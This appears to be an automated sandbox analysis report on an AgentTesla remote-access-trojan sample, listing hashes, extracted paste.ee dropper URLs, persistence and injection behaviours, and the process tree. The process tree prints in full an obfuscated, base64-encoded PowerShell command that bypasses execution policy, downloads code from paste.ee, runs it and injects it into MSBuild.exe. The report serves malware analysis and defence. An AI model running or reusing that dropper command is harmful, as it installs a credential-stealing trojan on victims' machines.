Analysis
-
max time kernel
147s -
max time network
107s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
13-07-2020 05:29
Static task
static1
Behavioral task
behavioral1
Sample
nnLfl.exe
Resource
win7
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
nnLfl.exe
Resource
win10v200430
0 signatures
0 seconds
General
-
Target
nnLfl.exe
-
Size
125KB
-
MD5
b438cf5e9aa34e6cfa3d8d27d2649326
-
SHA1
a2545f5c8af6da03288dd0b24ddc72fbb35cad2d
-
SHA256
c4c846dfa5755910d28a93a91ecfea8dcde72860fea03da1a47adf9ce65470a1
-
SHA512
d14ff36b56a7312a8860a87d242548b5e7df3f7174daeb2031b12a8d1bf5cfa8680442bf8ad1eb8393ec27fd65f6c02dfd51a93ba1974f6fa470218ef055ffdc
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
httP://paste.ee/r/3rgRS
ps1.dropper
httPs://paste.ee/r/fgIgt
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
AgentTesla Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/1320-1-0x0000000000400000-0x000000000044C000-memory.dmp family_agenttesla behavioral2/memory/1320-2-0x0000000000446E9E-mapping.dmp family_agenttesla -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 4 872 powershell.exe 5 872 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
MSBuild.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run\Myfile = "C:\\Users\\Admin\\AppData\\Roaming\\Myfile\\Myfile.exe" MSBuild.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 872 set thread context of 1320 872 powershell.exe MSBuild.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
nnLfl.exepowershell.exeMSBuild.exepid process 3768 nnLfl.exe 3768 nnLfl.exe 872 powershell.exe 872 powershell.exe 872 powershell.exe 1320 MSBuild.exe 1320 MSBuild.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
nnLfl.exepowershell.exeMSBuild.exedescription pid process Token: SeDebugPrivilege 3768 nnLfl.exe Token: SeDebugPrivilege 872 powershell.exe Token: SeDebugPrivilege 1320 MSBuild.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
MSBuild.exepid process 1320 MSBuild.exe -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
nnLfl.exepowershell.exedescription pid process target process PID 3768 wrote to memory of 872 3768 nnLfl.exe powershell.exe PID 3768 wrote to memory of 872 3768 nnLfl.exe powershell.exe PID 3768 wrote to memory of 872 3768 nnLfl.exe powershell.exe PID 872 wrote to memory of 1320 872 powershell.exe MSBuild.exe PID 872 wrote to memory of 1320 872 powershell.exe MSBuild.exe PID 872 wrote to memory of 1320 872 powershell.exe MSBuild.exe PID 872 wrote to memory of 1320 872 powershell.exe MSBuild.exe PID 872 wrote to memory of 1320 872 powershell.exe MSBuild.exe PID 872 wrote to memory of 1320 872 powershell.exe MSBuild.exe PID 872 wrote to memory of 1320 872 powershell.exe MSBuild.exe PID 872 wrote to memory of 1320 872 powershell.exe MSBuild.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\nnLfl.exe"C:\Users\Admin\AppData\Local\Temp\nnLfl.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AcABhAHMAdABlAC4AZQBlAC8AcgAvADMAcgBnAFIAUwAnACkALgBSAGUAcABsAGEAYwBlACgAIgBeACIALAAgACIANAA0ACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACoAIgAsACAAIgA0ADgAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAIwAiACwAIAAiADcAOAAiACkAfABJAEUAWAA7AFsAQgB5AHQAZQBbAF0AXQAkAGYAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AZgBnAEkAZwB0ACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAEMALgBNAF0AOgA6AFIAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABmACkA2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx